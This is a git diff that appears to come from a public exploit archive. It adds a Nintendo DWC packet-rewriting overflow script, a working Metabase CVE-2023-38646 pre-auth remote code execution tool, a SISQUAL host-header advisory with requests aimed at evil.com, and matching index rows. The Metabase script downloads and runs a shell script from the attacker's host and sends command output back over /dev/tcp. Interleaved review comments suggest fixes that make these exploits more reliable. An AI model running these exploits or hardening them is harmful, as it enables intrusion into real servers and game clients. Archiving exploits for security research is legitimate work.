diff --git a/exploits/hardware/local/51798.py b/exploits/hardware/local/51798.py
new file mode 100755
index 000000000..d2cd8322e
--- /dev/null
+++ b/exploits/hardware/local/51798.py
@@ -0,0 +1,68 @@
+# Exploit Title: DS Wireless Communication Remote Code Execution
+# Date: 11 Oct 2023
+# Exploit Author: MikeIsAStar
+# Vendor Homepage: https://www.nintendo.com
+# Version: Unknown
+# Tested on: Wii
+# CVE: CVE-2023-45887
+
+"""This code will inject arbitrary code into a client's game.
+
+You are fully responsible for all activity that occurs while using this code.
+The author of this code can not be held liable to you or to anyone else as a
+result of damages caused by the usage of this code.
+"""
+
+import re
+import sys
+
+try:
+    import pydivert
+except ModuleNotFoundError:
+    sys.exit("The 'pydivert' module is not installed !")
+
+
+# Variables
+LR_SAVE = b'\x41\x41\x41\x41'
+assert len(LR_SAVE) == 0x04
+PADDING = b'MikeStar'
+assert len(PADDING) > 0x00
+
+# Constants
+DWC_MATCH_COMMAND_INVALID = b'\xFE'
+PADDING_LENGTH = 0x23C
+FINAL_KEY = b'\\final\\'
+WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
+
+
+def try_modify_payload(payload):
+    message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
+    message = re.search(message_pattern, payload)
+    if not message:
+        return None
+
+    payload = payload[:message.end()]
+    payload += DWC_MATCH_COMMAND_INVALID
+    payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
+    payload += LR_SAVE
+    payload += FINAL_KEY
+    return payload
+
+
+def main():
+    try:
+        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
+            for packet in packet_buffer:
+                payload = try_modify_payload(packet.payload)
+                if payload is not None:
+                    print('Modified a GPCM message !')
+                    packet.payload = payload
+                    packet_buffer.send(packet)
+    except KeyboardInterrupt:
+        pass
+    except PermissionError:
+        sys.exit('This program must be run with administrator privileges !')
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/linux/webapps/51797.py b/exploits/linux/webapps/51797.py
new file mode 100755
index 000000000..0989d44cb
--- /dev/null
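Review bot: `LR_SAVE = b'\x41\x41\x41\x41'` is a placeholder, so the message `try_modify_payload` builds stuffs 0x41414141 into what the name suggests is the saved link register slot, and the observable effect on the receiving client is a crash rather than the "arbitrary code" the module docstring promises; the comment above it should say so, e.g. `# Placeholder: replace with the address control should transfer to on the target`. The rewrite also grows the TCP segment by `1 + PADDING_LENGTH + len(LR_SAVE) + len(FINAL_KEY)` bytes without adjusting sequence numbers, so any later segment on that connection would look overlapping to the peer — presumably acceptable only because this message is the last one that matters, which deserves a sentence in the docstring. Finally, `WINDIVERT_FILTER` diverts every outbound TCP segment with a payload on the host and regex-scans each one; narrowing it to the port the matchmaking traffic uses would keep unrelated traffic out of the diversion path.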
+++ b/exploits/linux/webapps/51797.py 
@@ -0,0 +1,165 @@
+# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution
+# Google Dork: N/A
+# Date: 13-10-2023
+# Exploit Author: Musyoka Ian
+# Vendor Homepage: https://www.metabase.com/
+# Software Link: https://www.metabase.com/
+# Version: metabase 0.46.6
+# Tested on: Ubuntu 22.04, metabase 0.46.6
+# CVE : CVE-2023-38646
+
+#!/usr/bin/env python3
+
+import socket
+from http.server import HTTPServer, BaseHTTPRequestHandler
+from typing import Any
+import requests
+from socketserver import ThreadingMixIn
+import threading
+import sys
+import argparse
+from termcolor import colored
+from cmd import Cmd
+import re
+from base64 import b64decode
+
+
+class Termial(Cmd):
+    prompt = "metabase_shell > "
+    def default(self,args):
+        shell(args)
+
+
+class Handler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        global success
+        if self.path == "/exploitable":
+
+            self.send_response(200)
+            self.end_headers()
+            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0 > /dev/tcp/{argument.lhost}/{argument.lport}".encode())
+            success = True
+
+        else:
+            print(self.path)
+            #sys.exit(1)
+    def log_message(self, format: str, *args: Any) -> None:
+        return None
+
+class Server(HTTPServer):
+    pass
+
+def run():
+    global httpserver
+    httpserver = Server(("0.0.0.0", argument.sport), Handler)
+    httpserver.serve_forever()
+
+def exploit():
+    global success, setup_token
+    print(colored("[*] Retriving setup token", "green"))
+    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")
+    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)
+    print(colored(f"[+] Setup token: {setup_token}", "green"))
+    print(colored("[*] Tesing if metabase is vulnerable", "green"))
+    payload = {
+        "token": setup_token,
+        "details":
+        {
+            "is_on_demand": False,
+            "is_full_sync": False,
+            "is_sample": False,
+            "cache_ttl": None,
+            "refingerprint": False,
+            "auto_run_queries": True,
+            "schedules":
+            {},
+            "details":
+            {
+                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",
+                "advanced-options": False,
+                "ssl": True
+            },
+            "name": "an-sec-research-musyoka",
+            "engine": "h2"
+        }
+    }
+    timer = 0
+    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))
+    thread = threading.Thread(target=run, )
+    thread.start()
+    while timer != 120:
+        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)
+        if success == True :
+            print(colored("[+] Metabase version seems exploitable", "green"))
+            break
+        elif timer == 120:
+            print(colored("[-] Service does not seem exploitable exiting ......", "red"))
+            sys.exit(1)
+
+    print(colored("[+] Exploiting the server", "red"))
+
+
+    terminal = Termial()
+    terminal.cmdloop()
+
+
+def shell(command):
+    global setup_token, payload2
+    payload2 = {
+        "token": setup_token,
+        "details":
+        {
+            "is_on_demand": False,
+            "is_full_sync": False,
+            "is_sample": False,
+            "cache_ttl": None,
+            "refingerprint": False,
+            "auto_run_queries": True,
+            "schedules":
+            {},
+            "details":
+            {
+                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",
+                "advanced-options": False,
+                "ssl": True
+            },
+            "name": "an-sec-research-team",
+            "engine": "h2"
+        }
+    }
+
+    output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)
+    bind_thread = threading.Thread(target=bind_function, )
+    bind_thread.start()
+    #updating the payload
+    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"
+    requests.post(f"{argument.url}/api/setup/validate", json=payload2)
+    #print(output.text)
+
+
+def bind_function():
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.bind(("0.0.0.0", argument.lport))
+        sock.listen()
+        conn, addr = sock.accept()
+        data = conn.recv(10240).decode("ascii")
+        print(f"\n{(b64decode(data)).decode()}")
+    except Exception as ex:
+        print(colored(f"[-] Error: {ex}", "red"))
+        pass
+
+
+
+if __name__ == "__main__":
+    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))
+    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")
+    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)
+    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)
+    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)
+    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)
+    argument = args.parse_args()
+    if argument.url.endswith("/"):
+        argument.url = argument.url[:-1]
+    success = False
+    exploit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51796.txt b/exploits/multiple/webapps/51796.txt
new file mode 100644
index 000000000..c98a6c4ab
--- /dev/null
+++ b/exploits/multiple/webapps/51796.txt
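Review bot: In `exploit()` the probe loop `while timer != 120:` never increments `timer`, so the `elif timer == 120:` branch is unreachable and an unexploitable target makes the script POST to `/api/setup/validate` forever instead of printing the "does not seem exploitable" message; add `timer += 1` (with a short `time.sleep`) at the end of the loop body and, because the loop then only ends by `break` or exhaustion, move the failure check after it: `if not success: print(colored("[-] Service does not seem exploitable exiting ......", "red")); sys.exit(1)`. A second problem is `re.search('"setup-token":"(.*?)"', ...).group(1)`: if the token is not present as a quoted string in the response (for example on an instance whose setup has already been completed), `re.search` returns `None` and the script dies with an `AttributeError` rather than a clear "no setup token, target not vulnerable" message. Also, `shell()` starts `bind_function` in a thread only after the first POST has already made the target fetch `exec.sh`, and the reverse connection triggered by the second POST races that thread's `bind`/`listen`; starting the listener before the POSTs (or waiting on a ready `threading.Event`) would make output collection reliable, and the `{command}` interpolated into the single-quoted JavaScript string will break on any command containing a `'`.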
@@ -0,0 +1,102 @@
+# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
+# Discovered Date: 17/03/2023
+# Reported Date: 17/03/2023
+# Resolved Date: 13/10/2023
+# Exploit Author: Omer Shaik (unknown_exploit)
+# Vendor Homepage: https://www.sisqualwfm.com
+# Version: 7.1.319.103
+# Tested on: SISQUAL WFM 7.1.319.103
+# Affected Version: sisqualWFM - 7.1.319.103
+# Fixed Version: sisqualWFM - 7.1.319.111
+# CVE : CVE-2023-36085
+# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+# Category: Web Apps
+
+
+
+
+A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.
+
+****************************************************************************************************
+Orignal Request
+****************************************************************************************************
+GET /sisqualIdentityServer/core/login HTTP/2
+Host: sisqualwfm.cloud
+Cookie: 
+Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+****************************************************************************************************
+Orignal Response
+****************************************************************************************************
+HTTP/2 302 Found
+Cache-Control: no-store, no-cache, must-revalidate
+Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
+Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+Date: Wed, 22 Mar 2023 13:22:10 GMT
+Content-Length: 0
+****************************************************************************************************
+
+
+
+
+██████╗ ██████╗ ██████╗
+██╔══██╗██╔═══██╗██╔════╝
+██████╔╝██║ ██║██║
+██╔═══╝ ██║ ██║██║
+██║ ╚██████╔╝╚██████╗
+╚═╝ ╚═════╝ ╚═════╝
+
+
+
+
+****************************************************************************************************
+Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
+****************************************************************************************************
+GET /sisqualIdentityServer/core/login HTTP/2
+Host: evil.com
+Cookie: 
+Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+****************************************************************************************************
+Response
+****************************************************************************************************
+HTTP/2 302 Found
+Cache-Control: no-store, no-cache, must-revalidate
+Location: https://evil.com/sisqualIdentityServer/core/
+Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+Content-Length: 0
+
+
+****************************************************************************************************
+Method of Attack
+****************************************************************************************************
+
+curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
+
+****************************************************************************************************
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e8a509c01..be86eb811 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
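Review bot: The write-up only shows the request's own `Host` value echoed back in the 302 `Location`, and the `curl` under "Method of Attack" is sent by the attacker to themselves; a victim's browser cannot be made to send a forged Host header, so nothing here yet demonstrates the cross-user impact the `UI:R`/`S:C` CVSS vector claims. The advisory should state what turns the reflection into an attack on other users — typically a fronting cache or CDN storing the poisoned redirect (the response carries `Cache-Control: no-store, no-cache`, which argues against that here), or the same host value being reused in password-reset or other generated links — and say which of these was confirmed. A sentence such as `Note: exploitation against other users requires an intermediary cache serving the poisoned redirect or the host value being reused in generated links; the reflection alone is not sufficient` would set expectations. Minor: "Orignal" in the two section headings is a typo for "Original".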
@@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info
 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,,
 24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,,
+51798,exploits/hardware/local/51798.py,"DS Wireless Communication - Remote Code Execution",2024-02-15,MikeIsAStar,local,hardware,,2024-02-15,2024-02-15,0,,,,,,
 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,,
 51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,,
 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c
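Review bot: The new `51798` row leaves the codes field (the one right after the verified flag `0`) empty, while the indexed file's header declares `CVE: CVE-2023-45887`; the neighbouring `51414` row shows the convention of carrying the CVE there, so searches and tooling keyed on CVE will miss this entry. The row should end `...,2024-02-15,2024-02-15,0,CVE-2023-45887,,,,,`. The `date_published` of 2024-02-15 also differs from the file's own `Date: 11 Oct 2023`; presumably the index records the publication date in this repository rather than the discovery date, but that is worth a quick check against the other new rows.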
@@ -8945,6 +8946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10433,exploits/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic",webapps,linux,80,2009-12-13,,1,OSVDB-61052;CVE-2009-4827,,,,,
 14818,exploits/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",webapps,linux,,2010-08-27,2017-07-19,0,,,,,,
 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,,2018-05-21,2018-06-15,0,,"Cross-Site Request Forgery (CSRF)",,,,
+51797,exploits/linux/webapps/51797.py,"Metabase 0.46.6 - Pre-Auth Remote Code Execution",2024-02-15,"Musyoka Ian",webapps,linux,,2024-02-15,2024-02-15,0,,,,,,
 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,,2019-02-22,2019-02-22,1,CVE-2019-3475;CVE-2019-3474,Traversal,,,,https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,,2019-10-03,2019-10-03,0,CVE-2019-17080,,,,,
 28653,exploits/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,webapps,linux,,2013-09-30,2013-09-30,0,CVE-2013-5697;OSVDB-97588,,,,,
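Review bot: The new `51797` row has an empty codes field although the indexed file's header declares `CVE : CVE-2023-38646`; rows such as `47457` and `28653` in the same hunk carry their CVE there, so this entry will not be found by CVE lookups. The row should end `...,2024-02-15,2024-02-15,0,CVE-2023-38646,,,,,`. The port column is also left blank even though the exploit targets an HTTP service; that matches most of the surrounding rows, so it is only worth filling if the project's convention for web apps is to record one.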
@@ -12176,6 +12178,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
+51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
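Review bot: The new `51796` row leaves the codes field empty although the indexed advisory declares `CVE : CVE-2023-36085`; the same commit's other new rows have the same omission, so the CVE column is being dropped consistently rather than by a one-off slip, and all three should be corrected together. This row should end `...,2024-02-15,2024-02-15,0,CVE-2023-36085,,,,,`. The description "Host Header Injection" is fine as a title, but since the advisory's own PoC only shows a reflected redirect target, a reviewer may want the same caveat recorded wherever the index's tags column is used for severity.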